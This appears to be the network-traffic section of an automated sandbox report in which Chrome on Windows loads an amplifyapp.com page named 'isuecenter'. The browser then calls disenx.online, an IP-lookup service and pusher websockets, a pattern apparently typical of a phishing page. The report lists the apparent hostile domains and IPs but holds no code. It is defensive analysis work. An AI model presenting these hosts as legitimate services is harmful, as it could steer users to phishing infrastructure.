                                          Mar 25, 2024 20:07:27.132612944 CET49734443192.168.2.6198.54.126.115
                                          Mar 25, 2024 20:07:27.132846117 CET49734443192.168.2.6198.54.126.115
                                          Mar 25, 2024 20:07:27.132858038 CET44349734198.54.126.115192.168.2.6
                                          Mar 25, 2024 20:07:27.321490049 CET49733443192.168.2.652.48.38.99
                                          Mar 25, 2024 20:07:28.020817995 CET49740443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:07:28.020850897 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:28.020926952 CET49740443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:07:28.022597075 CET49740443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:07:28.022608995 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:28.433721066 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:28.433794975 CET49740443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:07:28.437091112 CET49740443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:07:28.437103033 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:28.437316895 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:28.502865076 CET49740443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:07:28.862404108 CET49740443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:07:28.904238939 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:29.127372026 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:29.127393961 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:29.127401114 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:29.127427101 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:29.127441883 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:29.127451897 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:29.127466917 CET49740443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:07:29.127490997 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:29.127505064 CET49740443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:07:29.127619028 CET49740443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:07:29.127902985 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:29.127948999 CET49740443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:07:29.127955914 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:29.127968073 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:29.128019094 CET49740443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:07:29.432187080 CET49740443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:07:29.432214975 CET4434974052.165.165.26192.168.2.6
                                          Mar 25, 2024 20:07:30.306057930 CET49698443192.168.2.6173.222.162.64
                                          Mar 25, 2024 20:07:30.306236982 CET49698443192.168.2.6173.222.162.64
                                          Mar 25, 2024 20:07:30.308732033 CET49747443192.168.2.6173.222.162.64
                                          Mar 25, 2024 20:07:30.308772087 CET44349747173.222.162.64192.168.2.6
                                          Mar 25, 2024 20:07:30.308840036 CET49747443192.168.2.6173.222.162.64
                                          Mar 25, 2024 20:07:30.309937000 CET49747443192.168.2.6173.222.162.64
                                          Mar 25, 2024 20:07:30.309950113 CET44349747173.222.162.64192.168.2.6
                                          Mar 25, 2024 20:07:30.466212034 CET44349698173.222.162.64192.168.2.6
                                          Mar 25, 2024 20:07:30.466231108 CET44349698173.222.162.64192.168.2.6
                                          Mar 25, 2024 20:07:30.639180899 CET44349747173.222.162.64192.168.2.6
                                          Mar 25, 2024 20:07:30.639255047 CET49747443192.168.2.6173.222.162.64
                                          Mar 25, 2024 20:07:49.794483900 CET44349747173.222.162.64192.168.2.6
                                          Mar 25, 2024 20:07:49.794540882 CET49747443192.168.2.6173.222.162.64
                                          Mar 25, 2024 20:07:52.085103989 CET4434973352.48.38.99192.168.2.6
                                          Mar 25, 2024 20:07:52.132500887 CET49733443192.168.2.652.48.38.99
                                          Mar 25, 2024 20:08:06.042841911 CET49748443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:08:06.042885065 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:06.043148041 CET49748443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:08:06.043517113 CET49748443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:08:06.043529987 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:06.452718973 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:06.452892065 CET49748443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:08:06.463831902 CET49748443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:08:06.463844061 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:06.464194059 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:06.474087954 CET49748443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:08:06.520261049 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:06.847544909 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:06.847574949 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:06.847598076 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:06.847682953 CET49748443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:08:06.847682953 CET49748443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:08:06.847701073 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:06.847716093 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:06.847745895 CET49748443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:08:06.847752094 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:06.847773075 CET49748443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:08:06.847815990 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:06.847834110 CET49748443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:08:06.847946882 CET49748443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:08:06.851658106 CET49748443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:08:06.851658106 CET49748443192.168.2.652.165.165.26
                                          Mar 25, 2024 20:08:06.851674080 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:06.851682901 CET4434974852.165.165.26192.168.2.6
                                          Mar 25, 2024 20:08:16.676937103 CET49750443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:08:16.676969051 CET44349750172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:08:16.677047968 CET49750443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:08:16.677429914 CET49750443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:08:16.677443027 CET44349750172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:08:16.895127058 CET44349750172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:08:16.895400047 CET49750443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:08:16.895411015 CET44349750172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:08:16.895755053 CET44349750172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:08:16.896162987 CET49750443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:08:16.896240950 CET44349750172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:08:16.945637941 CET49750443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:08:17.082736015 CET4434973352.48.38.99192.168.2.6
                                          Mar 25, 2024 20:08:17.082809925 CET4434973352.48.38.99192.168.2.6
                                          Mar 25, 2024 20:08:17.083867073 CET49733443192.168.2.652.48.38.99
                                          Mar 25, 2024 20:08:17.083885908 CET4434973352.48.38.99192.168.2.6
                                          Mar 25, 2024 20:08:17.083933115 CET49733443192.168.2.652.48.38.99
                                          Mar 25, 2024 20:08:17.084161043 CET49733443192.168.2.652.48.38.99
                                          Mar 25, 2024 20:08:17.196516991 CET49751443192.168.2.699.81.234.0
                                          Mar 25, 2024 20:08:17.196557045 CET4434975199.81.234.0192.168.2.6
                                          Mar 25, 2024 20:08:17.196672916 CET49751443192.168.2.699.81.234.0
                                          Mar 25, 2024 20:08:17.196907997 CET49751443192.168.2.699.81.234.0
                                          Mar 25, 2024 20:08:17.196916103 CET4434975199.81.234.0192.168.2.6
                                          Mar 25, 2024 20:08:17.565646887 CET4434975199.81.234.0192.168.2.6
                                          Mar 25, 2024 20:08:17.565912008 CET49751443192.168.2.699.81.234.0
                                          Mar 25, 2024 20:08:17.565928936 CET4434975199.81.234.0192.168.2.6
                                          Mar 25, 2024 20:08:17.566927910 CET4434975199.81.234.0192.168.2.6
                                          Mar 25, 2024 20:08:17.567043066 CET49751443192.168.2.699.81.234.0
                                          Mar 25, 2024 20:08:17.567373037 CET49751443192.168.2.699.81.234.0
                                          Mar 25, 2024 20:08:17.567431927 CET4434975199.81.234.0192.168.2.6
                                          Mar 25, 2024 20:08:17.567578077 CET49751443192.168.2.699.81.234.0
                                          Mar 25, 2024 20:08:17.567584991 CET4434975199.81.234.0192.168.2.6
                                          Mar 25, 2024 20:08:17.618244886 CET49751443192.168.2.699.81.234.0
                                          Mar 25, 2024 20:08:17.935923100 CET4434975199.81.234.0192.168.2.6
                                          Mar 25, 2024 20:08:17.936012983 CET4434975199.81.234.0192.168.2.6
                                          Mar 25, 2024 20:08:17.936326981 CET49751443192.168.2.699.81.234.0
                                          Mar 25, 2024 20:08:17.936606884 CET49751443192.168.2.699.81.234.0
                                          Mar 25, 2024 20:08:17.936619997 CET4434975199.81.234.0192.168.2.6
                                          Mar 25, 2024 20:08:26.900080919 CET44349750172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:08:26.900155067 CET44349750172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:08:26.900418043 CET49750443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:08:27.013318062 CET49750443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:08:27.013339043 CET44349750172.253.115.104192.168.2.6
                                          TimestampSource PortDest PortSource IPDest IP
                                          Mar 25, 2024 20:07:14.827223063 CET53589921.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:14.876457930 CET53554561.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:15.467494965 CET53648271.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:15.717423916 CET5210153192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:15.717720032 CET5737153192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:15.840042114 CET53573711.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:15.840795994 CET53521011.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:16.619221926 CET6359553192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:16.619445086 CET4944053192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:16.714024067 CET53635951.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:16.714127064 CET53494401.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:17.818432093 CET5780553192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:17.819791079 CET6479253192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:17.914469004 CET53578051.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:17.915627003 CET53647921.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:17.916284084 CET53522521.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:19.789999008 CET5166053192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:19.793184042 CET5359853192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:19.825752020 CET5553653192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:19.826229095 CET5730053192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:19.892846107 CET53516601.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:19.896182060 CET53535981.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:19.921021938 CET53555361.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:19.921046019 CET53573001.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:20.097681999 CET53630081.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:20.502059937 CET6180453192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:20.502532959 CET6193053192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:20.508910894 CET5685653192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:20.509551048 CET4939453192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:20.598951101 CET53618041.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:20.604424000 CET53568561.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:20.605690956 CET53493941.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:20.635520935 CET53619301.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:21.394383907 CET5788153192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:21.394757986 CET5425153192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:21.445198059 CET5241953192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:21.446248055 CET6132053192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:21.515221119 CET53578811.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:21.515748978 CET53542511.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:21.549432039 CET53524191.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:21.549452066 CET53613201.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:22.957088947 CET6232853192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:22.957550049 CET5158453192.168.2.61.1.1.1
                                          Mar 25, 2024 20:07:23.055470943 CET53515841.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:23.055489063 CET53623281.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:32.572232008 CET53647841.1.1.1192.168.2.6
                                          Mar 25, 2024 20:07:51.724267006 CET53565151.1.1.1192.168.2.6
                                          Mar 25, 2024 20:08:14.069993973 CET53581131.1.1.1192.168.2.6
                                          Mar 25, 2024 20:08:14.151595116 CET53578311.1.1.1192.168.2.6
                                          Mar 25, 2024 20:08:17.086021900 CET4935053192.168.2.61.1.1.1
                                          Mar 25, 2024 20:08:17.086021900 CET6072653192.168.2.61.1.1.1
                                          Mar 25, 2024 20:08:17.182389021 CET53607261.1.1.1192.168.2.6
                                          Mar 25, 2024 20:08:17.195904016 CET53493501.1.1.1192.168.2.6
                                          TimestampSource IPDest IPChecksumCodeType
                                          Mar 25, 2024 20:07:20.635624886 CET192.168.2.61.1.1.1c27d(Port unreachable)Destination Unreachable
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Mar 25, 2024 20:07:15.717423916 CET192.168.2.61.1.1.10xa493Standard query (0)isuecenter.dig4pnjky2v0q.amplifyapp.comA (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:15.717720032 CET192.168.2.61.1.1.10x1cf9Standard query (0)isuecenter.dig4pnjky2v0q.amplifyapp.com65IN (0x0001)false
                                          Mar 25, 2024 20:07:16.619221926 CET192.168.2.61.1.1.10x436cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:16.619445086 CET192.168.2.61.1.1.10x360Standard query (0)www.google.com65IN (0x0001)false
                                          Mar 25, 2024 20:07:17.818432093 CET192.168.2.61.1.1.10xe21eStandard query (0)fonts.cdnfonts.comA (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:17.819791079 CET192.168.2.61.1.1.10xc03eStandard query (0)fonts.cdnfonts.com65IN (0x0001)false
                                          Mar 25, 2024 20:07:19.789999008 CET192.168.2.61.1.1.10x839cStandard query (0)disenx.onlineA (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:19.793184042 CET192.168.2.61.1.1.10x1294Standard query (0)disenx.online65IN (0x0001)false
                                          Mar 25, 2024 20:07:19.825752020 CET192.168.2.61.1.1.10x9359Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:19.826229095 CET192.168.2.61.1.1.10x9c6bStandard query (0)api.ipify.org65IN (0x0001)false
                                          Mar 25, 2024 20:07:20.502059937 CET192.168.2.61.1.1.10x8506Standard query (0)ws-eu.pusher.comA (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:20.502532959 CET192.168.2.61.1.1.10x4a7bStandard query (0)ws-eu.pusher.com65IN (0x0001)false
                                          Mar 25, 2024 20:07:20.508910894 CET192.168.2.61.1.1.10x691fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:20.509551048 CET192.168.2.61.1.1.10x2597Standard query (0)api.ipify.org65IN (0x0001)false
                                          Mar 25, 2024 20:07:21.394383907 CET192.168.2.61.1.1.10xb90eStandard query (0)isuecenter.dig4pnjky2v0q.amplifyapp.comA (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:21.394757986 CET192.168.2.61.1.1.10xc098Standard query (0)isuecenter.dig4pnjky2v0q.amplifyapp.com65IN (0x0001)false
                                          Mar 25, 2024 20:07:21.445198059 CET192.168.2.61.1.1.10x94d9Standard query (0)disenx.onlineA (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:21.446248055 CET192.168.2.61.1.1.10x9842Standard query (0)disenx.online65IN (0x0001)false
                                          Mar 25, 2024 20:07:22.957088947 CET192.168.2.61.1.1.10xc114Standard query (0)sockjs-eu.pusher.comA (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:22.957550049 CET192.168.2.61.1.1.10x4ba0Standard query (0)sockjs-eu.pusher.com65IN (0x0001)false
                                          Mar 25, 2024 20:08:17.086021900 CET192.168.2.61.1.1.10xacdbStandard query (0)sockjs-eu.pusher.com65IN (0x0001)false
                                          Mar 25, 2024 20:08:17.086021900 CET192.168.2.61.1.1.10x489fStandard query (0)sockjs-eu.pusher.comA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Mar 25, 2024 20:07:15.840795994 CET1.1.1.1192.168.2.60xa493No error (0)isuecenter.dig4pnjky2v0q.amplifyapp.com13.249.39.10A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:15.840795994 CET1.1.1.1192.168.2.60xa493No error (0)isuecenter.dig4pnjky2v0q.amplifyapp.com13.249.39.80A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:15.840795994 CET1.1.1.1192.168.2.60xa493No error (0)isuecenter.dig4pnjky2v0q.amplifyapp.com13.249.39.44A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:15.840795994 CET1.1.1.1192.168.2.60xa493No error (0)isuecenter.dig4pnjky2v0q.amplifyapp.com13.249.39.119A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:16.714024067 CET1.1.1.1192.168.2.60x436cNo error (0)www.google.com172.253.115.104A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:16.714024067 CET1.1.1.1192.168.2.60x436cNo error (0)www.google.com172.253.115.105A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:16.714024067 CET1.1.1.1192.168.2.60x436cNo error (0)www.google.com172.253.115.147A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:16.714024067 CET1.1.1.1192.168.2.60x436cNo error (0)www.google.com172.253.115.99A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:16.714024067 CET1.1.1.1192.168.2.60x436cNo error (0)www.google.com172.253.115.106A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:16.714024067 CET1.1.1.1192.168.2.60x436cNo error (0)www.google.com172.253.115.103A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:16.714127064 CET1.1.1.1192.168.2.60x360No error (0)www.google.com65IN (0x0001)false
                                          Mar 25, 2024 20:07:17.914469004 CET1.1.1.1192.168.2.60xe21eNo error (0)fonts.cdnfonts.com172.64.133.22A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:17.914469004 CET1.1.1.1192.168.2.60xe21eNo error (0)fonts.cdnfonts.com172.64.132.22A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:17.915627003 CET1.1.1.1192.168.2.60xc03eNo error (0)fonts.cdnfonts.com65IN (0x0001)false
                                          Mar 25, 2024 20:07:19.892846107 CET1.1.1.1192.168.2.60x839cNo error (0)disenx.online198.54.126.115A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:19.921021938 CET1.1.1.1192.168.2.60x9359No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:19.921021938 CET1.1.1.1192.168.2.60x9359No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:19.921021938 CET1.1.1.1192.168.2.60x9359No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:19.921046019 CET1.1.1.1192.168.2.60x9c6bNo error (0)api.ipify.org65IN (0x0001)false
                                          Mar 25, 2024 20:07:20.598951101 CET1.1.1.1192.168.2.60x8506No error (0)ws-eu.pusher.comsocket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                          Mar 25, 2024 20:07:20.598951101 CET1.1.1.1192.168.2.60x8506No error (0)socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com34.240.119.52A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:20.598951101 CET1.1.1.1192.168.2.60x8506No error (0)socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com52.51.175.106A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:20.598951101 CET1.1.1.1192.168.2.60x8506No error (0)socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com54.229.18.213A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:20.598951101 CET1.1.1.1192.168.2.60x8506No error (0)socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com34.248.236.42A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:20.598951101 CET1.1.1.1192.168.2.60x8506No error (0)socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com54.246.181.20A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:20.598951101 CET1.1.1.1192.168.2.60x8506No error (0)socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com54.170.12.172A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:20.598951101 CET1.1.1.1192.168.2.60x8506No error (0)socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com54.194.69.145A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:20.598951101 CET1.1.1.1192.168.2.60x8506No error (0)socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com63.35.48.104A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:20.604424000 CET1.1.1.1192.168.2.60x691fNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:20.604424000 CET1.1.1.1192.168.2.60x691fNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:20.604424000 CET1.1.1.1192.168.2.60x691fNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:20.605690956 CET1.1.1.1192.168.2.60x2597No error (0)api.ipify.org65IN (0x0001)false
                                          Mar 25, 2024 20:07:20.635520935 CET1.1.1.1192.168.2.60x4a7bNo error (0)ws-eu.pusher.comsocket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                          Mar 25, 2024 20:07:21.515221119 CET1.1.1.1192.168.2.60xb90eNo error (0)isuecenter.dig4pnjky2v0q.amplifyapp.com13.249.39.80A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:21.515221119 CET1.1.1.1192.168.2.60xb90eNo error (0)isuecenter.dig4pnjky2v0q.amplifyapp.com13.249.39.44A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:21.515221119 CET1.1.1.1192.168.2.60xb90eNo error (0)isuecenter.dig4pnjky2v0q.amplifyapp.com13.249.39.10A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:21.515221119 CET1.1.1.1192.168.2.60xb90eNo error (0)isuecenter.dig4pnjky2v0q.amplifyapp.com13.249.39.119A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:21.549432039 CET1.1.1.1192.168.2.60x94d9No error (0)disenx.online198.54.126.115A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:23.055470943 CET1.1.1.1192.168.2.60x4ba0No error (0)sockjs-eu.pusher.comingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                          Mar 25, 2024 20:07:23.055489063 CET1.1.1.1192.168.2.60xc114No error (0)sockjs-eu.pusher.comingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                          Mar 25, 2024 20:07:23.055489063 CET1.1.1.1192.168.2.60xc114No error (0)ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com52.48.38.99A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:23.055489063 CET1.1.1.1192.168.2.60xc114No error (0)ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com99.81.234.0A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:23.055489063 CET1.1.1.1192.168.2.60xc114No error (0)ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com54.216.83.132A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:29.010840893 CET1.1.1.1192.168.2.60x9e20No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 25, 2024 20:07:29.010840893 CET1.1.1.1192.168.2.60x9e20No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:07:41.966044903 CET1.1.1.1192.168.2.60x13f0No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 25, 2024 20:07:41.966044903 CET1.1.1.1192.168.2.60x13f0No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:08:06.817017078 CET1.1.1.1192.168.2.60xdbadNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 25, 2024 20:08:06.817017078 CET1.1.1.1192.168.2.60xdbadNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:08:17.182389021 CET1.1.1.1192.168.2.60x489fNo error (0)sockjs-eu.pusher.comingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                          Mar 25, 2024 20:08:17.182389021 CET1.1.1.1192.168.2.60x489fNo error (0)ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com99.81.234.0A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:08:17.182389021 CET1.1.1.1192.168.2.60x489fNo error (0)ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com54.216.83.132A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:08:17.182389021 CET1.1.1.1192.168.2.60x489fNo error (0)ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com52.48.38.99A (IP address)IN (0x0001)false
                                          Mar 25, 2024 20:08:17.195904016 CET1.1.1.1192.168.2.60xacdbNo error (0)sockjs-eu.pusher.comingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                          Mar 25, 2024 20:08:27.448102951 CET1.1.1.1192.168.2.60x5964No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 25, 2024 20:08:27.448102951 CET1.1.1.1192.168.2.60x5964No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                          • isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          • https:
                                            • fonts.cdnfonts.com
                                            • api.ipify.org
                                            • disenx.online
                                            • sockjs-eu.pusher.com
                                          • fs.microsoft.com
                                          • ws-eu.pusher.com
                                          • slscr.update.microsoft.com
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.64970513.249.39.104435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:16 UTC682OUTGET / HTTP/1.1
                                          Host: isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          sec-ch-ua-platform: "Windows"
                                          Upgrade-Insecure-Requests: 1
